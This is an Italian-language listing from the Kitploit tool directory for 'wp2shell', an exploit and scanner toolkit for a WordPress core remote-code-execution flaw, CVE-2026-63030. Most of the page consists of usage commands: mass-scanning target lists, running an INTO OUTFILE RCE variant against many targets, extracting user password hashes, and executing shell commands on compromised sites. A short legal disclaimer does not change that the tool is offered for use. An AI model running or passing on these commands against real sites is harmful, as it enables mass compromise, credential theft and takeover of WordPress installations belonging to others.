Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wp2shell — wp2shell - Exploit e Scanner per WordPress CVE-2026-63030 | Kitploit
Strumenti/GitHubGitHub/lutfifakee-project/wp2shell
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - Exploit e Scanner per WordPress CVE-2026-63030

Vedi Repository
611 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔍 wp2shell - Scanner di vulnerabilità ed Exploit per WordPress CVE-2026-63030

⚡ Scanner di vulnerabilità ed exploit veloce e in tempo reale per CVE-2026-63030 (wp2shell)


📌 Panoramica

wp2shell è un toolkit completo per rilevare e sfruttare CVE-2026-63030, una vulnerabilità critica in WordPress che consente a utenti non autenticati di eseguire codice in remoto tramite confusione delle route batch dell'API REST combinata con SQL injection.

🔍 Cos'è CVE-2026-63030?

CVE-2026-63030 (wp2shell) è una vulnerabilità critica scoperta da Adam Kues (Assetnote / Searchlight Cyber) che riguarda il core di WordPress. Combina due bug:

  1. GHSA-ff9f-jf42-662q - REST Batch Route Confusion
  2. GHSA-fpp7-x2x2-2mjf - author__not_in SQL Injection

📊 Versioni interessate



📦 Clonazione e Setup

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ Strumenti inclusi

1️⃣ wp2shell_scanner.py - Scanner veloce

Scanner multi-thread in tempo reale per il rilevamento di vulnerabilità su larga scala.

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - Exploit INTO OUTFILE

Dimostra la variante RCE INTO OUTFILE (richiede il privilegio FILE di MySQL).

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - Exploit a file singolo

Versione portabile a file singolo dell'exploit con funzionalità completa.

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ Disclaimer legale

IMPORTANTE: questo strumento è destinato esclusivamente a scopi educativi e a test autorizzati.

  • Utilizzalo solo su sistemi di tua proprietà o per i quali disponi di esplicita autorizzazione scritta al test.
  • L'accesso non autorizzato a sistemi informatici è illegale.
  • Gli sviluppatori non si assumono alcuna responsabilità per un uso improprio di questo software. Usalo in modo responsabile ed etico.
Scarica lo strumento
Intervallo di versioniImpattoStato
6.9.0 - 6.9.4🔴 RCE (Critico)❌ Vulnerabili
7.0.0 - 7.0.1🔴 RCE (Critico)❌ Vulnerabili
6.8.0 - 6.8.5🟡 SQLi (Elevato)❌ Vulnerabili
6.9.5+ / 7.0.2+✅ Corretto✅ Sicure